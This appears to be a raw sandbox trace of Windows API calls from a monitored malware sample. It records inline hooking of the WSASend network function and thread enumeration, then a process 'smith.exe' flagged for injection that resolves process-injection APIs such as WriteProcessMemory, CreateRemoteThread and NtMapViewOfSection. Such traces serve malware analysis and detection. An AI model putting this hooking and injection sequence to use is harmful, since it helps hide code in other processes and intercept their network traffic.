VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xc0000 [0171.779] RtlMoveMemory (in: Destination=0xc0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xc0000) [0171.780] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xb4224 | out: lpflOldProtect=0xb4224*=0x40) returned 1 [0171.785] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0171.785] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0171.785] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xb4224 | out: lpflOldProtect=0xb4224*=0x20) returned 1 [0171.785] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xd0000 [0171.786] RtlMoveMemory (in: Destination=0xd0000, Source=0x75bc4406, Length=0x5 | out: Destination=0xd0000) [0171.786] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xb4224 | out: lpflOldProtect=0xb4224*=0x40) returned 1 [0171.790] GetCurrentProcessId () returned 0x7f0 [0171.790] GetCurrentThreadId () returned 0xb20 [0171.790] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0171.792] Thread32First (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.792] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.793] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.793] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.793] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.793] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.794] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.794] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.794] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.795] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.795] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.795] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.795] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.821] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.822] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.822] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.822] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.823] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.823] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.823] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.823] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.824] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.824] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.824] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.825] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.825] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.825] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.825] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.826] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.826] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.826] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.826] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.827] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.827] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.827] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.828] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.828] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.828] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.828] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.829] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.829] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.829] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.829] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.830] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.830] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.830] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.831] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.831] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.831] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.831] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.832] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.832] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.832] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.833] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.833] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.833] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.833] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.834] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.834] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.834] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.834] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.835] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.835] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.835] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.836] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.836] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.836] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.836] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.837] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.837] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.837] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.838] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.838] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.838] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.838] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.839] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.839] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.839] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.839] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.840] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.840] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.840] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.841] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.841] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.841] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.841] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.842] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.842] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.842] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.843] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.843] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.843] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.843] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.844] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.844] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.844] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.844] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.845] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.845] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.846] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.846] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.846] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.846] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.847] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.847] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.847] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.848] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.848] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.848] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.848] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.849] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.849] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.849] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.850] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.850] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.850] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.850] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.851] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.851] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.851] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.851] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.852] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.852] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.852] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.853] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.853] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.853] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.853] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.854] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.854] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.854] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.854] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.855] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.855] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.855] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.856] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.856] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.856] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.856] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.857] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.857] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.857] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.857] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.858] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.858] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.858] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.859] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.859] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.859] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.859] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.860] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.860] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.861] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.861] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.861] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.861] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.862] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.862] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.862] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.863] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.863] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.863] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.863] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.864] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.864] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.864] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.864] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.865] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.865] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.865] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.866] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.866] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.866] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.866] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.867] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.867] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.867] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.867] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.868] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.868] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.868] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.869] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.869] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.869] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.869] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.870] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.870] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.870] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.870] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.871] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.871] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.871] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.872] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.872] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.872] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.872] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.873] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.873] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.873] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.873] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.874] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.874] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.874] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.875] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.875] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.875] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.875] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.876] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.876] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.876] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.877] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.877] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.877] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.877] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.878] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.878] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.878] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.878] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.879] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.879] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.879] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.880] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.880] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.880] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.880] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.881] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.881] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.881] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.881] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.882] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.882] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.882] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.883] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.883] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.883] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.883] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.884] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.884] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.884] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.884] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.885] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.885] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.885] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.886] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.886] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.886] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.886] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.887] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.887] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.887] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.904] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b4) returned 0x8c [0171.904] ResumeThread (hThread=0x8c) returned 0x1 [0171.904] CloseHandle (hObject=0x8c) returned 1 [0171.905] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x8c [0171.905] ResumeThread (hThread=0x8c) returned 0x1 [0171.905] CloseHandle (hObject=0x8c) returned 1 [0171.928] CloseHandle (hObject=0x88) returned 1 [0171.928] VirtualQuery (in: lpAddress=0x2c09b0, lpBuffer=0x225fe04, dwLength=0x1c | out: lpBuffer=0x225fe04*(BaseAddress=0x2c0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.928] GetProcessHeap () returned 0x2a0000 [0171.928] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c09b0 | out: hHeap=0x2a0000) returned 1 [0171.928] VirtualQuery (in: lpAddress=0x2c08a0, lpBuffer=0x225fe04, dwLength=0x1c | out: lpBuffer=0x225fe04*(BaseAddress=0x2c0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.928] GetProcessHeap () returned 0x2a0000 [0171.928] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c08a0 | out: hHeap=0x2a0000) returned 1 [0171.928] RtlExitUserThread (Status=0x0) Process: id = "33" image_name = "smith.exe" filename = "c:\\program files (x86)\\windows sidebar\\smith.exe" page_root = "0x65d3e000" os_pid = "0x7d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\smith.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 261 os_tid = 0x9a8 Thread: id = 262 os_tid = 0x7c0 Thread: id = 263 os_tid = 0xb38 [0171.594] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0171.594] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0171.595] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0171.596] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0171.597] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0171.597] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0171.597] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0171.597] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0171.597] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0171.597] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0171.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0171.597] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0171.606] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0171.606] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0171.606] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0171.610] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0171.610] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0171.610] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0171.611] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0171.611] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0171.611] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0171.611] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0171.611] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0171.611] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0171.611] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 